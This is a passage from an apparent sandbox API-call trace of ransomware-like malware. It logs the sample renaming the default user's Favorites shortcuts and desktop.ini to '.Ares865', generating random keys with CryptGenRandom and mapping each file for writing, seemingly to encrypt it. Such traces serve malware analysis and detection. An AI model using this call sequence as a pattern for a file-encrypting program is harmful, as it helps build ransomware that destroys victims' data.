Websites\\MSN Autos.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn autos.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.235] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.236] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.236] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.237] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.239] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.239] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.240] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.240] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865") returned 74 [0066.241] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn entertainment.url.ares865"), dwFlags=0x1) returned 1 [0066.242] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Entertainment.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn entertainment.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.242] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.242] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.243] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.245] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.245] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.246] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Money.url.Ares865") returned 66 [0066.247] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Money.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn money.url.ares865"), dwFlags=0x1) returned 1 [0066.248] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Money.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn money.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.248] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.248] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.249] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.249] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.249] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.251] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.251] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.252] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.252] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Sports.url.Ares865") returned 67 [0066.253] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Sports.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn sports.url.ares865"), dwFlags=0x1) returned 1 [0066.253] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Sports.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn sports.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.253] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.254] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.254] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.254] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.255] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.256] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.258] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN.url.Ares865") returned 60 [0066.259] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn.url.ares865"), dwFlags=0x1) returned 1 [0066.260] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.260] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.260] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.261] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.261] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.261] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.263] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.264] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.265] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.265] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSNBC News.url.Ares865") returned 67 [0066.265] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSNBC News.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msnbc news.url.ares865"), dwFlags=0x1) returned 1 [0066.266] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSNBC News.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msnbc news.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.266] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.266] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.267] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.269] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.270] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.270] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.270] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865") returned 77 [0066.271] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie add-on site.url.ares865"), dwFlags=0x1) returned 1 [0066.272] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie add-on site.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.272] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.272] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.273] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.273] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.273] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.275] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.276] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.276] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.276] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.277] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865") returned 87 [0066.277] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie site on microsoft.com.url.ares865"), dwFlags=0x1) returned 1 [0066.277] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\ie site on microsoft.com.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.278] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.278] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.279] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.279] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.279] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.281] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.283] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865") returned 80 [0066.283] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at home.url.ares865"), dwFlags=0x1) returned 1 [0066.283] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at home.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.284] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.284] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.284] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.284] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.285] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.287] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.289] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865") returned 80 [0066.289] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at work.url.ares865"), dwFlags=0x1) returned 1 [0066.289] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft at work.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.290] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.290] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.291] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.292] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.293] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.294] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.294] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.294] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865") returned 78 [0066.294] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft store.url.ares865"), dwFlags=0x1) returned 1 [0066.296] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\microsoft websites\\microsoft store.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.296] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=134) returned 1 [0066.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.297] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.297] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.297] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.299] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.299] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.301] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Links\\desktop.ini.Ares865") returned 57 [0066.301] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default user\\favorites\\links\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\favorites\\links\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.302] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\favorites\\links\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.303] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80) returned 1 [0066.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.304] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0066.305] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x420000 [0066.307] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Links\\Web Slice Gallery.url.Ares865") returned 67 [0066.308] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default user\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Links\\Web Slice Gallery.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\links\\web slice gallery.url.ares865"), dwFlags=0x1) returned 1 [0066.309] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Links\\Web Slice Gallery.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\links\\web slice gallery.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.309] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0066.309] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.310] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.310] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.310] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x118 [0066.312] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x420000 [0066.313] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, 